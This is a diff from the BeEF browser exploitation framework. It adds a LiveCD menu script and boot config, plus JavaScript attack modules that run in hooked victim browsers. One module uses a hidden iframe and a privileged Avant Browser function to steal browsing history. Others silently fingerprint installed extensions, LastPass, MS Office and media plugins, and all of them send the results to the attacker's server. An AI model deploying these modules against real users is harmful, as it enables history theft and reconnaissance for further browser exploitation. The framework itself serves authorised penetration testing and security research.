+# function to exit cleanly
+#
+# trap ctrl-c and call close_bash()
+trap close_bash_t INT
+
+close_bash_t() {
+	# beef would have quit
+	back_running="0"
+	close_bash
+}
+close_bash() {
+	echo ""	
+	echo "Are you sure you want to exit the LiveCD? (y/N): "
+	read var
+	if [ $var = "y" ] ; then
+		disable_msf
+		exit
+	else		
+		show_menu
+	fi
+}
+
+# set default values
+bac="0"
+
+
+
+#
+# User Menu Loop
+#
+show_menu() {
+	while true; do
+		clear
+		echo "======================================"
+		echo "          BeEF Live CD   "
+		echo "======================================"
+		echo ""
+		echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
+		echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+		echo "See the file 'home/beef/doc/COPYING' for copying permission"
+		echo ""
+		
+		echo "Welcome to the BeEF Live CD" 
+		echo "" 
+		
+		
+		#
+		# Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled 
+		# (remastersys has a habit of deleting them during Live CD Creation)
+		#
+		f1="/etc/ssh/ssh_host_rsa_key"
+		if [ -f $f1 ] ; then
+			echo "[1] Disable SSH                              [Currently Enabled]"
+			echo -ne "                                             beef@"
+			ifconfig | awk -F "[: ]+" '/inet addr:/ { if ($4 != "127.0.0.1") print $4 }'
+		else 
+			echo "[1] Enable SSH                               [Currently Disabled]"
+		fi
+		
+			echo "[2] Update BeEF"
+			echo "[3] Update sqlMap                            (Bundled with LiveCD)"
+			echo "[4] Update metasploit-framework              (Bundled with LiveCD)"
+			echo ""
+		if [ "$bac" = "1" ] ; then
+			echo "[5] Disable BeEF in background mode          [Currently Enabled]"
+		else
+			echo "[5] Enable BeEF in background mode           [Currently Disabled]"
+		fi
+		
+		if [ "$sqlm" = "1" ] ; then
+			echo "[6] Disable sqlMap demo                      [Currently Enabled]"
+		else
+			echo "[6] Enable sqlMap demo                       [Currently Disabled]"
+		fi
+		
+		if [ "$msf" = "1" ] ; then
+			echo "[7] Disable metasploit-framework integration [Currently Enabled]"
+		else
+			echo "[7] Enable metasploit-framework integration  [Currently Disabled]"
+		fi
+			echo ""
+			echo "[q] Quit to terminal"
+			echo ""
+		if [ "$back_running" = "1" ] ; then	
+			echo "[k] End BeEF process [BeEF running in background mode]"
+		else
+			echo "[b] Run BeEF"
+		fi
+			echo ""
+			echo -n "BeEF Live ~# "
+			read var
+		
+		#
+		# Quit liveCD loop
+		#	
+		if [ $var = "q" ] ; then
+			 close_bash
+		fi
+		
+		#
+		# Create SSH Keys to enable SSH or Delete the Keys to disable
+		#
+		if [ $var = "1" ] ; then
+			if [ -f $f1 ]
+			then
+				sudo rm /etc/ssh/ssh_host_rsa_key
+				sudo rm /etc/ssh/ssh_host_dsa_key 
+			else
+				 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+				 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+				 echo ""
+				 echo "Please provide a password for ssh user: beef"
+				 sudo passwd beef
+				 echo "ssh enabled"
+			 fi
+		fi
+		
+		#
+		# Update BeEF from github repository
+		#	
+		if [ $var = "2" ] ; then
+			 cd /opt/beef
+			 git stash
+			 git pull
+			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
+		fi
+		
+		#
+		# Update sqlmap from github repository
+		#	
+		if [ $var = "3" ] ; then
+			 cd /opt/sqlmap
+		 	 git stash
+			 git pull
+		fi
+		
+		#
+		# Update msf from github repository
+		#
+		if [ $var = "4" ] ; then
+			 cd /opt/metasploit-framework
+			 git stash
+			 git pull
+		fi
+		
+		#
+		# set BeEF to run in the background
+		#
+		if [ $var = "5" ] ; then
+			if [ "$bac" = "1" ] ; then
+			 	bac="0"
+			 	# check and disable sqlmap (requires beef run in the background)
+			 	sqlm="0"
+			else 
+				bac="1"
+			fi
+		fi
+		
+		#
+		# enable the sqlmap demo
+		#
+		if [ $var = "6" ] ; then
+			if [ "$sqlm" = "1" ] ; then
+			 	sqlm="0"
+			else 
+				sqlm="1"
+				# requires BeEF be run in the background
+				bac="1"
+			fi
+		fi
+		
+		#
+		# enable the msf integration
+		#
+		if [ $var = "7" ] ; then
+			if [ "$msf" = "1" ] ; then
+			 	msf="0"
+			 	disable_msf
+			else 
+				msf="1"
+				enable_msf
+			fi
+		fi
+		
+		#
+		# end background beef process
+		#
+		if [ $var = "k" ] ; then
+			pkill -x 'ruby'
+			back_running="0"
+		fi
+		
+		#
+		# Run BeEF
+		#
+		if [ $var = "b" ] ; then
+			
+			if [ "$msf" = "1" ] ; then
+				#
+				# First start msf if it is enabled
+				#
+				printf "Starting MSF (wait 45 seconds)..."
+				run_msf &
+				sleep 45
+			fi
+			
+			if [ "$bac" = "1" ] ; then
+				#
+				# run beef in the background
+				#
+			 	run_beef &
+				sleep 5
+				echo ""
+				echo "BeEF is running in the background, returning to the menu or running something else now..."
+				sleep 15
+				back_running="1"
+				#
+				# If the user has enabled it start sqlmap using beef as proxy
+				#
+				if [ $sqlm = "1" ] ; then
+					echo ""
+					echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
+					echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
+					sleep 5
+					python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
+				fi
+			else 
+				#
+				# run beef in the foreground
+				#
+				cd /opt/beef/
+				ruby beef -x
+			fi
+		fi	
+			
+	done
+}
+
+# show user menu
+show_menu
+
+
+

liveCD/isolinux.txt

@@ -0,0 +1,34 @@
+default vesamenu.c32
+prompt 0
+timeout 100
+
+menu title BeEF Live CD
+menu background splash.png
+menu color title 1;37;44 #c0ffffff #00000000 std
+
+label live
+  menu label live - BeEF Beef Live
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash --
+
+label xforcevesa
+  menu label xforcevesa - boot Live in safe graphics mode
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper xforcevesa initrd=/casper/initrd.gz quiet splash --
+
+label install
+  menu label install - start the installer directly
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper only-ubiquity initrd=/casper/initrd.gz quiet splash --
+
+label memtest
+  menu label memtest - Run memtest
+  kernel /install/memtest
+  append -
+
+label hd
+  menu label hd - boot the first hard disk
+  localboot 0x80
+  append -
+
+

modules/browser/avant_steal_history/command.js

@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
 
-	
+	if (!beef.browser.isA()) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+		return;
+	}
 
 	var avant_iframe = document.createElement("iframe");
 	//var avant_iframe = beef.dom.createInvisibleIframe();
-	avant_iframe.setAttribute('src', "browser:home");
-	avant_iframe.setAttribute('name','test2');
-	avant_iframe.setAttribute('width','0');
-	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('src',      'browser:home');
+	avant_iframe.setAttribute('name',     'avant_history_<%= @command_id %>');
+	avant_iframe.setAttribute('width',    '0');
+	avant_iframe.setAttribute('heigth',   '0');
 	avant_iframe.setAttribute('scrolling','no');
+	avant_iframe.setAttribute('style',    'display:none');
 
 	document.body.appendChild(avant_iframe);
 
 	var vstr = {value: ""};
 
-	if(window['test2'].navigator) {
-	//This works if FF is the rendering engine
-	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+	if (window['avant_history_<%= @command_id %>'].navigator) {
+		//This works if FF is the rendering engine
+		window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+	} else {
+		// this works if Chrome is the rendering engine
+		//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 	}
-	else {
-	// this works if Chrome is the rendering engine
-	//window['test2'].AFRunCommand(60003, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
-
-	}
-	
-
-	
-
-	
 
 });
 

modules/browser/avant_steal_history/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited URLs (Avant Browser)"
-            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
             authors: ["Roberto Suggi Liverani"]
             target:
-                working: ["ALL"]
+                working: ["FF"]

modules/browser/avant_steal_history/module.rb

@@ -21,7 +21,7 @@ class Avant_steal_history < BeEF::Core::Command
 		
 
 		return [
-			{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+			{'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
 		]
 
 	end

modules/browser/browser_fingerprinting/command.js

@@ -34,7 +34,12 @@ beef.execute(function() {
 		new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+		new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+		new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+		new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+		new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
+		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")
 	);
 

modules/browser/detect_activex/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = (beef.browser.hasActiveX())? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result);
+
+});
+

modules/browser/detect_activex/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_activex:
+            enable: true
+            category: "Browser"
+            name: "Detect ActiveX"
+            description: "This module will check if the browser has ActiveX support."
+            authors: ["bcoles"]
+            target:
+                user_notify: ["IE"]
+                not_working: ["All"]

modules/browser/detect_activex/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_activex < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['activex'] = @datastore['activex']
+		save content
+	end
+
+end

modules/browser/detect_extensions/command.js

@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	extensions = new Array(
+	chrome_extensions = new Array(
 		new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
 		new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
 		new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
@@ -1009,7 +1009,61 @@ beef.execute(function() {
 		new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
 	);
 
-	var detect = function(addon_id, addon_name) {
+        var firefox_extensions = {
+                "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
+                "Auto Copy" : "chrome://autocopy/skin/autocopy.png",
+                "ColorZilla" : "chrome://colorzilla/skin/logo.png",
+                "Customize Google" : "chrome://customizegoogle/skin/32x32.png",
+                "DownThemAll!" : "chrome://dta/content/immagini/icon.png",
+                "Faster Fox" : "chrome://fasterfox/skin/icon.png",
+                "Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
+                "FlashGot" : "chrome://flashgot/skin/icon32.png",
+                "Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
+                "Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
+                "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
+                "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
+                "IE View" : "chrome://ieview/skin/ieview-icon.png",
+                "JS View" : "chrome://jsview/skin/jsview.gif",
+                "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
+                "MeasureIt" : "chrome://measureit/skin/measureit.png",
+                "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
+                "SEOpen" : "chrome://seopen/skin/seopen.png",
+                "Search Status" : "chrome://searchstatus/skin/cax10.png",
+                "Server Switcher" : "chrome://switcher/skin/icon.png",
+                "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
+                "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
+                "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
+                "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
+                "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
+                "Web Developer" : "chrome://webdeveloper/content/images/logo.png",
+                "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
+                "UrlParams" : "chrome://urlparams/skin/urlparams32.png",
+                "NewsFox" : "chrome://newsfox/skin/images/home.png",
+                "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
+                "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
+                "QuickJava" : "chrome://quickjava/content/js.png",
+                "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
+                "BBCode" : "chrome://bbcode/skin/bbcode.png",
+                "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
+                "ConQuery" : "chrome://conquery/skin/conquery.png",
+                "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
+                "Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
+                "FireBug" : "chrome://firebug/content/firebug32.png",
+                "FoxyTunes" : "chrome://foxytunes/skin/logo.png",
+                "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
+                "SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
+                "spooFX" : "chrome://spoofx/skin/main/spoofx.png",
+                "Statusbar Clock" : "chrome://timestatus/skin/icon.png",
+                "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
+                "UnPlug" : "chrome://unplug/skin/unplug.png",
+                "View Source Chart" : "chrome://vrs/skin/vrssmall.png",
+                "XPather" : "chrome://xpather/content/iconka.png",
+                "WOT" : "chrome://wot/skin/fusion/logo.png",
+                "LastPass" : "chrome://lastpass/skin/vaultdelete.png",
+
+        };
+
+	var detect_chrome_extension = function(addon_id, addon_name) {
 		var s = document.createElement('script');
 		s.onload = function() {
 			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
@@ -1018,11 +1072,38 @@ beef.execute(function() {
 		document.body.appendChild(s);
 	}
 
-	try {
-		for (var i=0; i<extensions.length; i++) {
-			detect(extensions[i][0], extensions[i][1]);
-		}
-	} catch(e) {}
+        var detect_firefox_extension = function(addon_url, addon_name) {
+                var img = document.createElement("img");
+                img.setAttribute("border", '0');
+                img.setAttribute("width", '0');
+                img.setAttribute("height", '0');
+                img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');");
+                img.setAttribute("src", addon_url);
+        }
+
+        if(beef.browser.isC()) {
+                try {
+                        for (var i=0; i<chrome_extensions.length; i++) {
+                                detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
+                        }
+                } catch(e) {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed');
+                }
+        } else if(beef.browser.isFF()) {
+                try {
+                        for (var i in firefox_extensions) {
+                                detect_firefox_extension(firefox_extensions[i], i);
+                        }
+                } catch(e) {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed');
+                }
+        } else if(beef.browser.isIE()) {
+                try {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions is not supported');
+                } catch(e) {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions failed');
+                }
+        }
 
 });
 

modules/browser/detect_extensions/config.yaml

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_extensions:
+            enable: true
+            category: "Browser"
+            name: "Detect Extensions"
+            description: "This module detects extensions installed in Google Chrome and Mozilla Firefox."
+            authors: ["koto", "bcoles", "nbblrr"]
+            target:
+                working:
+                    FF:
+                        min_ver: 1
+                        max_ver: latest
+                    C:
+                        min_ver: 1
+                        max_ver: 18
+                not_working: ["All"]

modules/browser/detect_extensions/module.rb

@@ -5,14 +5,15 @@
 #
 # More info:
 #	http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
+#	http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
 #
-class Detect_chrome_extensions < BeEF::Core::Command
+class Detect_extensions < BeEF::Core::Command
 
   def post_execute
     content = {}
     content['extension'] = @datastore['extension']
     save content
   end
-  
+
 end
 

modules/browser/detect_foxit/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
+
+});
+

modules/browser/detect_foxit/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_foxit:
+            enable: true
+            category: "Browser"
+            name: "Detect Foxit Reader"
+            description: "This module will check if the browser has Foxit Reader Plugin."
+            authors: ["javuto"]
+            target:
+                working: ["All"]

modules/browser/detect_foxit/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_foxit < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['foxit'] = @datastore['foxit']
+		save content
+	end
+
+end

modules/browser/detect_lastpass/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "Not in use or not installed";
+
+	var lpdiv = document.getElementById('hiddenlpsubmitdiv');
+	if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
+		//We've got the first detection of LP
+		result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
+	} else if ($j("script:contains(lastpass_iter)").length > 0) {
+		//We've got the second detection of LP
+		result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
+	} else {
+
+		//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
+		if (document.getElementsByTagName("form").length == 0) {
+			//No forms
+			result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
+		}
+		
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
+});
+

modules/browser/detect_lastpass/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_lastpass:
+            enable: true
+            category: "Browser"
+            name: "Detect LastPass"
+            description: "This module checks if the LastPass extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["All"]

modules/browser/detect_lastpass/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_lastpass < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
+		save content
+	end
+
+end

modules/browser/detect_office/command.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+            var ma = 1;
+            var mb = 1;
+            var mc = 1;
+            var md = 1;
+            try {
+                ma = new ActiveXObject("SharePoint.OpenDocuments.4")
+            } catch (e) {}
+            try {
+                mb = new ActiveXObject("SharePoint.OpenDocuments.3")
+            } catch (e) {}
+            try {
+                mc = new ActiveXObject("SharePoint.OpenDocuments.2")
+            } catch (e) {}
+            try {
+                md = new ActiveXObject("SharePoint.OpenDocuments.1")
+            } catch (e) {}
+            var a = typeof ma;
+            var b = typeof mb;
+            var c = typeof mc;
+            var d = typeof md;
+            var key = "No Office Found";
+            if (a == "object" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2010"
+            }
+            if (a == "number" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2007"
+            }
+            if (a == "number" && b == "number" && c == "object" && d == "object") {
+                key = "Office 2003"
+            }
+            if (a == "number" && b == "number" && c == "number" && d == "object") {
+                key = "Office Xp"
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
+
+});
+

modules/browser/detect_office/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_office:
+            enable: true
+            category: "Browser"
+            name: "Detect MS Office"
+            description: "This module detect the version of MS Office if installed"
+            authors: ["nbblrr"]
+            target:
+                working: ["IE"]
+                not_working: ["All"]

modules/browser/detect_office/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_office < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['office'] = @datastore['office']
+		save content
+	end
+
+end

modules/browser/detect_quicktime/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = (beef.browser.hasQuickTime())? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "quicktime="+result);
+
+});
+

modules/browser/detect_quicktime/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_quicktime:
+            enable: true
+            category: "Browser"
+            name: "Detect QuickTime"
+            description: "This module will check if the browser has Quicktime support."
+            authors: ["bcoles"]
+            target:
+                working: ["All"]

modules/browser/detect_quicktime/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_quicktime < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['quicktime'] = @datastore['quicktime']
+		save content
+	end
+
+end

modules/browser/detect_realplayer/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasRealPlayer() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "realplayer="+result);
+
+});
+